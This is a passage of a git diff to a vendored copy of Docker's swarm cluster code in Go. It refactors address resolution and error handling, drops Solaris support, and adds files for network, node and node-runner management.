- interfaceAddr, err := resolveInterfaceAddr(c.config.DefaultAdvertiseAddr) - if err == nil { - return interfaceAddr.String(), listenAddrPort, nil - } - if err != errNoSuchInterface { + defaultAdvertiseIP, err := resolveInputIPAddr(c.config.DefaultAdvertiseAddr, false) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadDefaultAdvertiseAddr + } return "", "", err } - // If it's not an interface, it must be an IP (for now) - if ip := net.ParseIP(c.config.DefaultAdvertiseAddr); ip == nil || ip.IsUnspecified() { - return "", "", errBadDefaultAdvertiseAddr - } - - return c.config.DefaultAdvertiseAddr, listenAddrPort, nil + return defaultAdvertiseIP.String(), listenAddrPort, nil } systemAddr, err := c.resolveSystemAddr() @@ -103,6 +87,22 @@ func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (st return systemAddr.String(), listenAddrPort, nil } +func resolveDataPathAddr(dataPathAddr string) (string, error) { + if dataPathAddr == "" { + // dataPathAddr is not defined + return "", nil + } + // If a data path flag is specified try to resolve the IP address. + dataPathIP, err := resolveInputIPAddr(dataPathAddr, false) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadDataPathAddr + } + return "", err + } + return dataPathIP.String(), nil +} + func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { // Use a specific interface's IP address. 
intf, err := net.InterfaceByName(specifiedInterface) @@ -124,13 +124,13 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { if ipAddr.IP.To4() != nil { // IPv4 if interfaceAddr4 != nil { - return nil, fmt.Errorf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP) + return nil, configError(fmt.Sprintf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP)) } interfaceAddr4 = ipAddr.IP } else { // IPv6 if interfaceAddr6 != nil { - return nil, fmt.Errorf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP) + return nil, configError(fmt.Sprintf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP)) } interfaceAddr6 = ipAddr.IP } @@ -138,7 +138,7 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { } if interfaceAddr4 == nil && interfaceAddr6 == nil { - return nil, fmt.Errorf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface) + return nil, configError(fmt.Sprintf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface)) } // In the case that there's exactly one IPv4 address @@ -149,6 +149,30 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { return interfaceAddr6, nil } +// resolveInputIPAddr tries to resolve the IP address from the string passed as input +// - tries to match the string as an interface name, if so returns the IP address associated with it +// - on failure of previous step tries to parse the string as an IP address itself +// if succeeds returns the IP address +func resolveInputIPAddr(input string, isUnspecifiedValid bool) (net.IP, error) { + // Try to see if it is an interface name + interfaceAddr, err := resolveInterfaceAddr(input) + if err == nil { + return interfaceAddr, nil + } + // String matched interface but there is a potential ambiguity to 
be resolved + if err != errNoSuchInterface { + return nil, err + } + + // String is not an interface check if it is a valid IP + if ip := net.ParseIP(input); ip != nil && (isUnspecifiedValid || !ip.IsUnspecified()) { + return ip, nil + } + + // Not valid IP found + return nil, errBadNetworkIdentifier +} + func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) { // Use the system's only IP address, or fail if there are // multiple addresses to choose from. Skip interfaces which @@ -162,8 +186,7 @@ func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) { var systemInterface string // List Docker-managed subnets - v4Subnets := c.config.NetworkSubnetsProvider.V4Subnets() - v6Subnets := c.config.NetworkSubnetsProvider.V6Subnets() + v4Subnets, v6Subnets := c.config.NetworkSubnetsProvider.Subnets() ifaceLoop: for _, intf := range interfaces { @@ -272,7 +295,7 @@ func listSystemIPs() []net.IP { func errMultipleIPs(interfaceA, interfaceB string, addrA, addrB net.IP) error { if interfaceA == interfaceB { - return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB) + return configError(fmt.Sprintf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB)) } - return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB) + return configError(fmt.Sprintf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB)) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go index 3d4f239bda..62e4f61a65 100644 --- 
a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go @@ -1,6 +1,4 @@ -// +build linux - -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( "net" diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go index 4e845f5c8f..fe75848e57 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go @@ -1,6 +1,6 @@ -// +build !linux,!solaris +// +build !linux -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import "net" diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go deleted file mode 100644 index 57a894b251..0000000000 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go +++ /dev/null @@ -1,57 +0,0 @@ -package cluster - -import ( - "bufio" - "fmt" - "net" - "os/exec" - "strings" -) - -func (c *Cluster) resolveSystemAddr() (net.IP, error) { - defRouteCmd := "/usr/sbin/ipadm show-addr -p -o addr " + - "`/usr/sbin/route get default | /usr/bin/grep interface | " + - "/usr/bin/awk '{print $2}'`" - out, err := exec.Command("/usr/bin/bash", "-c", defRouteCmd).Output() - if err != nil { - return nil, fmt.Errorf("cannot get default route: %v", err) - } - - defInterface := strings.SplitN(string(out), "/", 2) - defInterfaceIP := net.ParseIP(defInterface[0]) - - return defInterfaceIP, nil -} - -func listSystemIPs() []net.IP { - var systemAddrs []net.IP - cmd := exec.Command("/usr/sbin/ipadm", "show-addr", "-p", "-o", "addr") - cmdReader, err := cmd.StdoutPipe() - if err != nil { - return nil - } - - if err := cmd.Start(); err != nil { - return nil - } - - scanner := bufio.NewScanner(cmdReader) - go 
func() { - for scanner.Scan() { - text := scanner.Text() - nameAddrPair := strings.SplitN(text, "/", 2) - // Let go of loopback interfaces and docker interfaces - systemAddrs = append(systemAddrs, net.ParseIP(nameAddrPair[0])) - } - }() - - if err := scanner.Err(); err != nil { - fmt.Printf("scan underwent err: %+v\n", err) - } - - if err := cmd.Wait(); err != nil { - fmt.Printf("run command wait: %+v\n", err) - } - - return systemAddrs -} diff --git a/vendor/github.com/docker/docker/daemon/cluster/networks.go b/vendor/github.com/docker/docker/daemon/cluster/networks.go new file mode 100644 index 0000000000..b8e31baa11 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/networks.go @@ -0,0 +1,316 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "fmt" + + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/runconfig" + swarmapi "github.com/docker/swarmkit/api" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// GetNetworks returns all current cluster managed networks. +func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) { + list, err := c.getNetworks(nil) + if err != nil { + return nil, err + } + removePredefinedNetworks(&list) + return list, nil +} + +func removePredefinedNetworks(networks *[]apitypes.NetworkResource) { + if networks == nil { + return + } + var idxs []int + for i, n := range *networks { + if v, ok := n.Labels["com.docker.swarm.predefined"]; ok && v == "true" { + idxs = append(idxs, i) + } + } + for i, idx := range idxs { + idx -= i + *networks = append((*networks)[:idx], (*networks)[idx+1:]...) 
+ } +} + +func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters}) + if err != nil { + return nil, err + } + + networks := make([]apitypes.NetworkResource, 0, len(r.Networks)) + + for _, network := range r.Networks { + networks = append(networks, convert.BasicNetworkFromGRPC(*network)) + } + + return networks, nil +} + +// GetNetwork returns a cluster network by an ID. +func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) { + var network *swarmapi.Network + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + n, err := getNetwork(ctx, state.controlClient, input) + if err != nil { + return err + } + network = n + return nil + }); err != nil { + return apitypes.NetworkResource{}, err + } + return convert.BasicNetworkFromGRPC(*network), nil +} + +// GetNetworksByName returns cluster managed networks by name. +// It is ok to have multiple networks here. #18864 +func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) { + // Note that swarmapi.GetNetworkRequest.Name is not functional. + // So we cannot just use that with c.GetNetwork. + return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{ + Names: []string{name}, + }) +} + +func attacherKey(target, containerID string) string { + return containerID + ":" + target +} + +// UpdateAttachment signals the attachment config to the attachment +// waiter who is trying to start or attach the container to the +// network. 
+func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error { + c.mu.Lock() + attacher, ok := c.attachers[attacherKey(target, containerID)] + if !ok || attacher == nil { + c.mu.Unlock() + return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target) + } + if attacher.inProgress { + logrus.Debugf("Discarding redundant notice of resource allocation on network %s for task id %s", target, attacher.taskID) + c.mu.Unlock() + return nil + } + attacher.inProgress = true + c.mu.Unlock() + + attacher.attachWaitCh <- config + + return nil +} + +// WaitForDetachment waits for the container to stop or detach from +// the network. +func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { + c.mu.RLock() + attacher, ok := c.attachers[attacherKey(networkName, containerID)] + if !ok { + attacher, ok = c.attachers[attacherKey(networkID, containerID)] + } + state := c.currentNodeState() + if state.swarmNode == nil || state.swarmNode.Agent() == nil { + c.mu.RUnlock() + return errors.New("invalid cluster node while waiting for detachment") + } + + c.mu.RUnlock() + agent := state.swarmNode.Agent() + if ok && attacher != nil && + attacher.detachWaitCh != nil && + attacher.attachCompleteCh != nil { + // Attachment may be in progress still so wait for + // attachment to complete. + select { + case <-attacher.attachCompleteCh: + case <-ctx.Done(): + return ctx.Err() + } + + if attacher.taskID == taskID { + select { + case <-attacher.detachWaitCh: + case <-ctx.Done(): + return ctx.Err() + } + } + } + + return agent.ResourceAllocator().DetachNetwork(ctx, taskID) +} + +// AttachNetwork generates an attachment request towards the manager. 
+func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) { + aKey := attacherKey(target, containerID) + c.mu.Lock() + state := c.currentNodeState() + if state.swarmNode == nil || state.swarmNode.Agent() == nil { + c.mu.Unlock() + return nil, errors.New("invalid cluster node while attaching to network") + } + if attacher, ok := c.attachers[aKey]; ok { + c.mu.Unlock() + return attacher.config, nil + } + + agent := state.swarmNode.Agent() + attachWaitCh := make(chan *network.NetworkingConfig) + detachWaitCh := make(chan struct{}) + attachCompleteCh := make(chan struct{}) + c.attachers[aKey] = &attacher{ + attachWaitCh: attachWaitCh, + attachCompleteCh: attachCompleteCh, + detachWaitCh: detachWaitCh, + } + c.mu.Unlock() + + ctx, cancel := c.getRequestContext() + defer cancel() + + taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses) + if err != nil { + c.mu.Lock() + delete(c.attachers, aKey) + c.mu.Unlock() + return nil, fmt.Errorf("Could not attach to network %s: %v", target, err) + } + + c.mu.Lock() + c.attachers[aKey].taskID = taskID + close(attachCompleteCh) + c.mu.Unlock() + + logrus.Debugf("Successfully attached to network %s with task id %s", target, taskID) + + release := func() { + ctx, cancel := c.getRequestContext() + defer cancel() + if err := agent.ResourceAllocator().DetachNetwork(ctx, taskID); err != nil { + logrus.Errorf("Failed remove network attachment %s to network %s on allocation failure: %v", + taskID, target, err) + } + } + + var config *network.NetworkingConfig + select { + case config = <-attachWaitCh: + case <-ctx.Done(): + release() + return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err()) + } + + c.mu.Lock() + c.attachers[aKey].config = config + c.mu.Unlock() + + logrus.Debugf("Successfully allocated resources on network %s for task id %s", target, taskID) + + 
return config, nil +} + +// DetachNetwork unblocks the waiters waiting on WaitForDetachment so +// that a request to detach can be generated towards the manager. +func (c *Cluster) DetachNetwork(target string, containerID string) error { + aKey := attacherKey(target, containerID) + + c.mu.Lock() + attacher, ok := c.attachers[aKey] + delete(c.attachers, aKey) + c.mu.Unlock() + + if !ok { + return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target) + } + + close(attacher.detachWaitCh) + return nil +} + +// CreateNetwork creates a new cluster managed network. +func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) { + if runconfig.IsPreDefinedNetwork(s.Name) { + err := notAllowedError(fmt.Sprintf("%s is a pre-defined network and cannot be created", s.Name)) + return "", errors.WithStack(err) + } + + var resp *swarmapi.CreateNetworkResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + networkSpec := convert.BasicNetworkCreateToGRPC(s) + r, err := state.controlClient.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { + return "", err + } + + return resp.Network.ID, nil +} + +// RemoveNetwork removes a cluster network. 
+func (c *Cluster) RemoveNetwork(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + network, err := getNetwork(ctx, state.controlClient, input) + if err != nil { + return err + } + + _, err = state.controlClient.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}) + return err + }) +} + +func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error { + // Always prefer NetworkAttachmentConfigs from TaskTemplate + // but fallback to service spec for backward compatibility + networks := s.TaskTemplate.Networks + if len(networks) == 0 { + networks = s.Networks + } + for i, n := range networks { + apiNetwork, err := getNetwork(ctx, client, n.Target) + if err != nil { + ln, _ := c.config.Backend.FindNetwork(n.Target) + if ln != nil && runconfig.IsPreDefinedNetwork(ln.Name()) { + // Need to retrieve the corresponding predefined swarm network + // and use its id for the request. + apiNetwork, err = getNetwork(ctx, client, ln.Name()) + if err != nil { + return errors.Wrap(errdefs.NotFound(err), "could not find the corresponding predefined swarm network") + } + goto setid + } + if ln != nil && !ln.Info().Dynamic() { + errMsg := fmt.Sprintf("The network %s cannot be used with services. 
Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name()) + return errors.WithStack(notAllowedError(errMsg)) + } + return err + } + setid: + networks[i].Target = apiNetwork.ID + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/noderunner.go b/vendor/github.com/docker/docker/daemon/cluster/noderunner.go new file mode 100644 index 0000000000..87e65aaead --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/noderunner.go @@ -0,0 +1,388 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "fmt" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/executor/container" + lncluster "github.com/docker/libnetwork/cluster" + swarmapi "github.com/docker/swarmkit/api" + swarmnode "github.com/docker/swarmkit/node" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "google.golang.org/grpc" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// nodeRunner implements a manager for continuously running swarmkit node, restarting them with backoff delays if needed. +type nodeRunner struct { + nodeState + mu sync.RWMutex + done chan struct{} // closed when swarmNode exits + ready chan struct{} // closed when swarmNode becomes active + reconnectDelay time.Duration + config nodeStartConfig + + repeatedRun bool + cancelReconnect func() + stopping bool + cluster *Cluster // only for accessing config helpers, never call any methods. TODO: change to config struct +} + +// nodeStartConfig holds configuration needed to start a new node. Exported +// fields of this structure are saved to disk in json. Unexported fields +// contain data that shouldn't be persisted between daemon reloads. +type nodeStartConfig struct { + // LocalAddr is this machine's local IP or hostname, if specified. 
+ LocalAddr string + // RemoteAddr is the address that was given to "swarm join". It is used + // to find LocalAddr if necessary. + RemoteAddr string + // ListenAddr is the address we bind to, including a port. + ListenAddr string + // AdvertiseAddr is the address other nodes should connect to, + // including a port. + AdvertiseAddr string + // DataPathAddr is the address that has to be used for the data path + DataPathAddr string + // JoinInProgress is set to true if a join operation has started, but + // not completed yet. + JoinInProgress bool + + joinAddr string + forceNewCluster bool + joinToken string + lockKey []byte + autolock bool + availability types.NodeAvailability +} + +func (n *nodeRunner) Ready() chan error { + c := make(chan error, 1) + n.mu.RLock() + ready, done := n.ready, n.done + n.mu.RUnlock() + go func() { + select { + case <-ready: + case <-done: + } + select { + case <-ready: + default: + n.mu.RLock() + c <- n.err + n.mu.RUnlock() + } + close(c) + }() + return c +} + +func (n *nodeRunner) Start(conf nodeStartConfig) error { + n.mu.Lock() + defer n.mu.Unlock() + + n.reconnectDelay = initialReconnectDelay + + return n.start(conf) +} + +func (n *nodeRunner) start(conf nodeStartConfig) error { + var control string + if runtime.GOOS == "windows" { + control = `\\.\pipe\` + controlSocket + } else { + control = filepath.Join(n.cluster.runtimeRoot, controlSocket) + } + + joinAddr := conf.joinAddr + if joinAddr == "" && conf.JoinInProgress { + // We must have been restarted while trying to join a cluster. + // Continue trying to join instead of forming our own cluster. + joinAddr = conf.RemoteAddr + } + + // Hostname is not set here. 
Instead, it is obtained from + // the node description that is reported periodically + swarmnodeConfig := swarmnode.Config{ + ForceNewCluster: conf.forceNewCluster, + ListenControlAPI: control, + ListenRemoteAPI: conf.ListenAddr, + AdvertiseRemoteAPI: conf.AdvertiseAddr, + JoinAddr: joinAddr, + StateDir: n.cluster.root, + JoinToken: conf.joinToken, + Executor: container.NewExecutor( + n.cluster.config.Backend, + n.cluster.config.PluginBackend, + n.cluster.config.ImageBackend, + n.cluster.config.VolumeBackend, + ), + HeartbeatTick: n.cluster.config.RaftHeartbeatTick, + // Recommended value in etcd/raft is 10 x (HeartbeatTick). + // Lower values were seen to have caused instability because of + // frequent leader elections when running on flakey networks. + ElectionTick: n.cluster.config.RaftElectionTick, + UnlockKey: conf.lockKey, + AutoLockManagers: conf.autolock, + PluginGetter: n.cluster.config.Backend.PluginGetter(), + } + if conf.availability != "" { + avail, ok := swarmapi.NodeSpec_Availability_value[strings.ToUpper(string(conf.availability))] + if !ok { + return fmt.Errorf("invalid Availability: %q", conf.availability) + } + swarmnodeConfig.Availability = swarmapi.NodeSpec_Availability(avail) + } + node, err := swarmnode.New(&swarmnodeConfig) + if err != nil { + return err + } + if err := node.Start(context.Background()); err != nil { + return err + } + + n.done = make(chan struct{}) + n.ready = make(chan struct{}) + n.swarmNode = node + if conf.joinAddr != "" { + conf.JoinInProgress = true + } + n.config = conf + savePersistentState(n.cluster.root, conf) + + ctx, cancel := context.WithCancel(context.Background()) + + go func() { + n.handleNodeExit(node) + cancel() + }() + + go n.handleReadyEvent(ctx, node, n.ready) + go n.handleControlSocketChange(ctx, node) + + return nil +} + +func (n *nodeRunner) handleControlSocketChange(ctx context.Context, node *swarmnode.Node) { + for conn := range node.ListenControlSocket(ctx) { + n.mu.Lock() + if n.grpcConn != conn 
{ + if conn == nil { + n.controlClient = nil + n.logsClient = nil + } else { + n.controlClient = swarmapi.NewControlClient(conn) + n.logsClient = swarmapi.NewLogsClient(conn) + // push store changes to daemon + go n.watchClusterEvents(ctx, conn) + } + } + n.grpcConn = conn + n.mu.Unlock() + n.cluster.SendClusterEvent(lncluster.EventSocketChange) + } +} + +func (n *nodeRunner) watchClusterEvents(ctx context.Context, conn *grpc.ClientConn) { + client := swarmapi.NewWatchClient(conn) + watch, err := client.Watch(ctx, &swarmapi.WatchRequest{ + Entries: []*swarmapi.WatchRequest_WatchEntry{ + { + Kind: "node", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "service", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "network", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "secret", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "config", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + }, + IncludeOldObject: true, + }) + if err != nil { + logrus.WithError(err).Error("failed to watch cluster store") + return + } + for { + msg, err := watch.Recv() + if err != nil { + // store watch is broken + errStatus, ok := status.FromError(err) + if !ok || errStatus.Code() != codes.Canceled { + logrus.WithError(err).Error("failed to receive changes from store watch API") + } + return + } + select { + case <-ctx.Done(): + return + case n.cluster.watchStream <- msg: + } + } +} + +func (n *nodeRunner) handleReadyEvent(ctx context.Context, node *swarmnode.Node, ready chan struct{}) { + select { + case <-node.Ready(): + n.mu.Lock() + n.err = nil + if n.config.JoinInProgress { + n.config.JoinInProgress = false + 
savePersistentState(n.cluster.root, n.config) + } + n.mu.Unlock() + close(ready) + case <-ctx.Done(): + } + n.cluster.SendClusterEvent(lncluster.EventNodeReady) +} + +func (n *nodeRunner) handleNodeExit(node *swarmnode.Node) { + err := detectLockedError(node.Err(context.Background())) + if err != nil { + logrus.Errorf("cluster exited with error: %v", err) + } + n.mu.Lock() + n.swarmNode = nil + n.err = err + close(n.done) + select { + case <-n.ready: + n.enableReconnectWatcher() + default: + if n.repeatedRun { + n.enableReconnectWatcher() + } + } + n.repeatedRun = true + n.mu.Unlock() +} + +// Stop stops the current swarm node if it is running. +func (n *nodeRunner) Stop() error { + n.mu.Lock() + if n.cancelReconnect != nil { // between restarts + n.cancelReconnect() + n.cancelReconnect = nil + } + if n.swarmNode == nil { + n.mu.Unlock() + return nil + } + n.stopping = true + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + n.mu.Unlock() + if err := n.swarmNode.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") { + return err + } + n.cluster.SendClusterEvent(lncluster.EventNodeLeave) + <-n.done + return nil +} + +func (n *nodeRunner) State() nodeState { + if n == nil { + return nodeState{status: types.LocalNodeStateInactive} + } + n.mu.RLock() + defer n.mu.RUnlock() + + ns := n.nodeState + + if ns.err != nil || n.cancelReconnect != nil { + if errors.Cause(ns.err) == errSwarmLocked { + ns.status = types.LocalNodeStateLocked + } else { + ns.status = types.LocalNodeStateError + } + } else { + select { + case <-n.ready: + ns.status = types.LocalNodeStateActive + default: + ns.status = types.LocalNodeStatePending + } + } + + return ns +} + +func (n *nodeRunner) enableReconnectWatcher() { + if n.stopping { + return + } + n.reconnectDelay *= 2 + if n.reconnectDelay > maxReconnectDelay { + n.reconnectDelay = maxReconnectDelay + } + logrus.Warnf("Restarting swarm in %.2f seconds", 
n.reconnectDelay.Seconds()) + delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay) + n.cancelReconnect = cancel + + go func() { + <-delayCtx.Done() + if delayCtx.Err() != context.DeadlineExceeded { + return + } + n.mu.Lock() + defer n.mu.Unlock() + if n.stopping { + return + } + + if err := n.start(n.config); err != nil { + n.err = err + } + }() +} + +// nodeState represents information about the current state of the cluster and +// provides access to the grpc clients. +type nodeState struct { + swarmNode *swarmnode.Node + grpcConn *grpc.ClientConn + controlClient swarmapi.ControlClient + logsClient swarmapi.LogsClient + status types.LocalNodeState + actualLocalAddr string + err error +} + +// IsActiveManager returns true if node is a manager ready to accept control requests. It is safe to access the client properties if this returns true. +func (ns nodeState) IsActiveManager() bool { + return ns.controlClient != nil +} + +// IsManager returns true if node is a manager. +func (ns nodeState) IsManager() bool { + return ns.swarmNode != nil && ns.swarmNode.Manager() != nil +} + +// NodeID returns node's ID or empty string if node is inactive. +func (ns nodeState) NodeID() string { + if ns.swarmNode != nil { + return ns.swarmNode.NodeID() + } + return "" +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/nodes.go b/vendor/github.com/docker/docker/daemon/cluster/nodes.go new file mode 100644 index 0000000000..3c073b0bac --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/nodes.go @@ -0,0 +1,105 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + + apitypes "github.com/docker/docker/api/types" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetNodes returns a list of all nodes known to a cluster. 
+func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + filters, err := newListNodesFilters(options.Filters) + if err != nil { + return nil, err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListNodes( + ctx, + &swarmapi.ListNodesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + nodes := make([]types.Node, 0, len(r.Nodes)) + + for _, node := range r.Nodes { + nodes = append(nodes, convert.NodeFromGRPC(*node)) + } + return nodes, nil +} + +// GetNode returns a node based on an ID. +func (c *Cluster) GetNode(input string) (types.Node, error) { + var node *swarmapi.Node + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + n, err := getNode(ctx, state.controlClient, input) + if err != nil { + return err + } + node = n + return nil + }); err != nil { + return types.Node{}, err + } + + return convert.NodeFromGRPC(*node), nil +} + +// UpdateNode updates existing nodes properties. 
+func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + nodeSpec, err := convert.NodeSpecToGRPC(spec) + if err != nil { + return errdefs.InvalidParameter(err) + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + currentNode, err := getNode(ctx, state.controlClient, input) + if err != nil { + return err + } + + _, err = state.controlClient.UpdateNode( + ctx, + &swarmapi.UpdateNodeRequest{ + NodeID: currentNode.ID, + Spec: &nodeSpec, + NodeVersion: &swarmapi.Version{ + Index: version, + }, + }, + ) + return err + }) +} + +// RemoveNode removes a node from a cluster +func (c *Cluster) RemoveNode(input string, force bool) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + node, err := getNode(ctx, state.controlClient, input) + if err != nil { + return err + } + + _, err = state.controlClient.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}) + return err + }) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go index f4c72ae13b..533baa0e17 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go +++ b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go @@ -1,4 +1,4 @@ -package provider +package provider // import "github.com/docker/docker/daemon/cluster/provider" import "github.com/docker/docker/api/types" diff --git a/vendor/github.com/docker/docker/daemon/cluster/secrets.go b/vendor/github.com/docker/docker/daemon/cluster/secrets.go index 2b9eb5da1d..c6fd842081 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/secrets.go +++ b/vendor/github.com/docker/docker/daemon/cluster/secrets.go @@ -1,6 +1,8 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( + "context" + apitypes 
"github.com/docker/docker/api/types" types "github.com/docker/docker/api/types/swarm" "github.com/docker/docker/daemon/cluster/convert" @@ -8,32 +10,30 @@ import ( ) // GetSecret returns a secret from a managed swarm cluster -func (c *Cluster) GetSecret(id string) (types.Secret, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Secret{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.node.client.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: id}) - if err != nil { +func (c *Cluster) GetSecret(input string) (types.Secret, error) { + var secret *swarmapi.Secret + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := getSecret(ctx, state.controlClient, input) + if err != nil { + return err + } + secret = s + return nil + }); err != nil { return types.Secret{}, err } - - return convert.SecretFromGRPC(r.Secret), nil + return convert.SecretFromGRPC(secret), nil } // GetSecrets returns all secrets of a managed swarm cluster. 
